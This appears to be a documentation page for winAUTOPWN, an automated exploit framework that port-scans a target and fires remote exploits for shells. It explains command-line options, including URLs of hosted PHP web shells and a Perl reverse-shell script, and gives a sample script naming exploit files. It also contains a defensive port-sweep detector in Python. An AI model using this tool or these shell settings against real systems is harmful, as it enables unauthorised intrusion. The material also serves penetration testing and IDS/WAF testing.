WinAUTOPWN:
is a minimal Interactive Exploit Framework which acts as a frontend for quick vulnerability exploitation of systems. It is a collection of remote exploits with which one can compromise vulnerable systems. winAUTOPWN takes inputs like IP address, Hostname, CMS Path, etc. and does a smart multi-threaded portscan for TCP ports 1 to 65535. Open ports are then recognized and the exploits applicable to those ports are executed with the aim of gaining a remote shell or, in certain cases, the ability to run remote commands.
WINDOWS AUTOPWN or winAUTOPWN is an auto shell gaining / security penetration tool. It can also be used to test IDS, IPS and other monitoring sensors/software.
Besides the above, winAUTOPWN can also be used as an efficiency testing tool for Intrusion Detection Systems (IDS) and Web Application Filters (WAF). winAUTOPWN has a vast repository of exploits for various operating systems like Microsoft Windows, Apple MAC OSX, Linux (various) and BSD systems, as well as for well-known services and daemon software. winAUTOPWN also contains a massive database of Shell Upload Vulnerability, Remote File Inclusion and Remote Command Execution exploits. These can be fired one after the other instantly, which can aid in checking whether the WAF is preventing / alerting accordingly against such threats or not. Similarly, shell-aiming exploits can be fired in a row to test the strength and effectiveness of IDS and IPS.
WinAUTOPWN also has a BSD based cousin called bsdAUTOPWN. bsdAUTOPWN is just like winAUTOPWN but is not an exact recompilation of winAUTOPWN. It has been written from scratch for and on FreeBSD OS to match the power and functionality offered by that operating system. Like winAUTOPWN, bsdAUTOPWN has a multi-threaded portscan feature; it too detects open ports and attempts to exploit them accordingly using the available exploits in the arsenal. We'll come to a detailed discussion about bsdAUTOPWN later.
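As an added defender-side illustration (this is not code from winAUTOPWN or its author): the full-range TCP port sweep described above is easy to spot in connection logs. The Python snippet below flags any source/destination pair that touches 1000 or more distinct ports within 60 seconds, run over a constructed log sample in a hypothetical "timestamp src dst dport" format; the IP addresses are the ones used in this page's examples and the log lines are made up.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample log: one source sweeping 1500 ports of one host within a
# minute (the winAUTOPWN-style behaviour), plus two benign connections from
# another source. Format "ts src dst dport" is hypothetical, not a real product's.
SAMPLE_LOG = "\n".join(
    [f"2024-01-01T10:00:{i % 60:02d} 192.168.3.34 192.168.3.3 {port}"
     for i, port in enumerate(range(1, 1501))]
    + ["2024-01-01T10:05:00 192.168.3.50 192.168.3.3 443",
       "2024-01-01T10:05:01 192.168.3.50 192.168.3.3 80"]
)


def parse_line(line):
    """Split one 'ts src dst dport' line into (datetime, src, dst, int port)."""
    ts, src, dst, dport = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport)


def detect_port_sweeps(log_text, min_ports=1000, window=timedelta(seconds=60)):
    """Return {(src, dst): peak_distinct_ports} for every pair that contacted at
    least `min_ports` distinct destination ports inside any `window`-long span."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            ts, src, dst, dport = parse_line(line)
            events[(src, dst)].append((ts, dport))

    hits = {}
    for pair, evs in events.items():
        evs.sort()                       # sliding window over time-ordered events
        in_window, left, peak = Counter(), 0, 0
        for ts, port in evs:
            in_window[port] += 1
            while ts - evs[left][0] > window:   # evict events older than the window
                old_port = evs[left][1]
                in_window[old_port] -= 1
                if in_window[old_port] == 0:
                    del in_window[old_port]
                left += 1
            peak = max(peak, len(in_window))
        if peak >= min_ports:
            hits[pair] = peak
    return hits


if __name__ == "__main__":
    for (src, dst), n in detect_port_sweeps(SAMPLE_LOG).items():
        print(f"possible port sweep: {src} -> {dst}, {n} distinct ports in 60s")
```

Raising `min_ports` or shrinking `window` tunes the rule; a scan of all 65535 ports will exceed any sensible threshold long before it completes.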
There is a Windows GUI as well, which takes similar inputs and feeds them to the main winAUTOPWN console.
How to use the command-line in winAUTOPWN?
Command-line usage has always been the mark of a power user in any console based penetration testing tool. winAUTOPWN's entire interactive interface can be pre-fed with values using the command-line options explained below:
--skipscan This option forces winAUTOPWN to skip the port-scan module and use the file OpenPorts.TXT in the directory. This is useful when you already know which ports are open on your target system: just fill in the port numbers and save the file. It is also helpful when you want winAUTOPWN to check for exploits for one or a few particular ports only.
Example: winAUTOPWN.exe --skipscan

--onlyscan This option forces winAUTOPWN to skip the entire exploit testing modules. With this option winAUTOPWN will only perform a PortScan and will exit after printing the list of open ports.
Example: winAUTOPWN.exe --onlyscan

--targetIP This option provides the Target IP address of the system being tested. Ensure that you specify the IP address after it.
Example: winAUTOPWN.exe --targetIP 192.168.3.3

--targetHOST This option provides the Target Hostname of the system being tested. Ensure that you specify the complete NetBIOS name for Windows systems on a LAN and the entire domain name for target systems on a WAN.
Example: winAUTOPWN.exe --targetHOST SYSTEM-2
winAUTOPWN.exe --targetHOST www.somewebsite9.com

--attackerIP This option provides your own IP, i.e. the Attacker's IP address of the system from which winAUTOPWN is being run. Ensure that you specify the IP address after it.
Example: winAUTOPWN.exe --attackerIP 192.168.3.34

--cmsPATH This option specifies the Content Management System directory name in the URL. Generally this is the first directory name right after the domain name or the IP address. Ensure that you specify the correct cmsPATH. You can leave this blank if you do not intend to test the web application vulnerability exploits.
Example: winAUTOPWN.exe --cmsPATH /xampp

--actcmsPATH This option specifies the actual Content Management System path, i.e. the internal CMS path behind the URL. Generally this is not visible in the URL. Often CMS packages installed on the webserver have a default path, making it easily guessable. Ensure that you specify the correct actcmsPATH. You can leave this blank if you do not intend to test the web application vulnerability exploits.
Example: winAUTOPWN.exe --actcmsPATH /Applications/xampp
winAUTOPWN.exe --actcmsPATH /opt/xampp

--phpshellPATH This option specifies the path of the online PHP web-shell which is used along with the Remote File Inclusion vulnerability exploits. There is a default encoded PHP web-shell path. To change it, ensure that you specify the correct phpshellPATH; the shell must accept a variable named CMD to execute system commands, so the GET request should look like
http://shellp.ath/shell.php?CMD=ls
You can leave this blank if you do not intend to test the web application vulnerability exploits.
Example: winAUTOPWN.exe --phpshellPATH http://website.moc/folder/r57.txt

--actphpshellPATH This option specifies the actual internal path of the online PHP web-shell which is used along with the Remote File Inclusion vulnerability exploits. You can leave this blank if you do not intend to test the web application vulnerability exploits.
Example: winAUTOPWN.exe --actphpshellPATH /var/log/tmp

--cmsadminUSR This option specifies the administrator / admin username, if known. This is required for a few web-app exploits to work correctly. You can leave this blank if you do not intend to test the web application vulnerability exploits.
Example: winAUTOPWN.exe --cmsadminUSR admin9

--ftpUSR This option specifies the FTP username, if known. This is required for a few FTP exploits to work correctly. If you leave this blank winAUTOPWN will set an internal default FTP username.
Example: winAUTOPWN.exe --ftpUSR user6

--ftpPASSWD This option specifies the FTP password, if known. This is required for a few FTP exploits to work correctly. If you leave this blank winAUTOPWN will set an internal default FTP password.
Example: winAUTOPWN.exe --ftpPASSWD S3cR37P@55W0rD

--perlrevshURL This option specifies the path of a remote Perl script which should be able to send a /bin/sh or an equivalent shell to a remote IP. The script should ideally be invocable from perl with a remote_IP and a remote_port argument. Note that the remote_IP will be your IP, to which your target will connect, and the remote_port will be a port opened on your IP. You do not have to worry about providing parameters to the Perl file or opening the port locally; winAUTOPWN handles that automatically, because that is what WINDOWS AUTOPWN actually means. Also note that any Perl script with these capabilities can be used and can be hosted on any webserver; this option just needs the path to the Perl file. The script is pointed to and used in a few exploits in which a remote connect-back shell is used as a payload. There is a default Perl shell path encoded, so if you have no clue or no online resource, you can leave this option blank and winAUTOPWN will try to handle it on its own.
Example: winAUTOPWN.exe --perlrevshURL http://website.moc/various/reverse-shell.pl

--mailFROM This option specifies the sender's email address to be used in a few SMTP exploits. This field has a default sender's email address crafted by winAUTOPWN: it is always root@ followed by the target hostname, i.e. the --targetHOST value provided earlier. You can set a value for this field to override that default.
Example: winAUTOPWN.exe --mailFROM admin@some.web.info

--mailTO This option specifies the receiver's email address to be used in a few SMTP exploits. This field has a default receiver's email address crafted by winAUTOPWN: it is always postmaster@ followed by the target hostname, i.e. the --targetHOST value provided earlier. You can set a value for this field to override that default.
Example: winAUTOPWN.exe --mailTO postmaster@some.web.info

--proxyIP This option provides the Proxy Server IP address. Do note that only a few exploits support proxies, and only if you have supplied both a Proxy IP and a Proxy port. Ensure that you specify the correct Proxy IP address after it.
Example: winAUTOPWN.exe --proxyIP 192.168.3.80

--proxyPORT This option provides the Proxy Server port number. Do note that only a few exploits support proxies, and only if you have supplied both a Proxy IP and a Proxy port. Ensure that you specify the correct Proxy port number after it.
Example: winAUTOPWN.exe --proxyPORT 8080
What are the other WELF Scripting Terminologies?
can be , , OR (for exe files)
is the filename of the Exploit. Ex: exploitname.exe
is your Target's IP address. Ex: 10.40.140.1
is your Target's Hostname. Ex: www.somegate.com OR TSUNAMI-MP11
is your IP. Ex: 10.40.140.144
is the Target CMS Path. Ex: /awstats
is the Actual CMS Path on the disk. Ex: /usr/home/www/awstats
is an online URL for a PHP shell. Ex: http://www.shell.com/phpshell.txt
is an admin username for the Target CMS.
is the FTP/CMS Username.
is the FTP/CMS Password.
is the Proxy IP address to be used for some exploits to pass through.
is the Proxy Port Number to be used for some exploits to pass through.
is the CMS Path with a trailing slash. Ex: /awstats/
is the Actual CMS Path on the disk with a trailing slash. Ex: /usr/home/www/awstats/
is the typical complete address of the Target Hostname along with the CMS Path. Ex: www.somesite.com/awstats
is the typical complete address of the Target Hostname along with the CMS Path and a trailing slash. Ex: www.somesite.com/awstats/
is the CMS path following the standard http://. Ex: http://www.somesite.com/awstats
is the Target Hostname following the standard http://. Ex: http://www.somesite.com
is the online URL for a Perl reverse connect script. Ex: http://vrac.fifi.be/warehouse/various/reverse-shell.pl
is the sender's email address to be used in a few SMTP exploits.
is the receiver's email address to be used in a few SMTP exploits.
Sample WELF script (myWELFexploits.txt) with three exploits to be loaded:
PERL webframe_0.76_RFI(c99)-xplt_method3.pl -vuln -shell ^^^^
PYTHON Steamcast(HTTP_Request)_(SEH)_Rem_Buf_Ovrflw_xplt.py 80 100 ^^^^
bitweaver_firecmd.exe ^^^^
To run the above script, as mentioned earlier, run
winAUTOPWN.exe --welf myWELFexploits.txt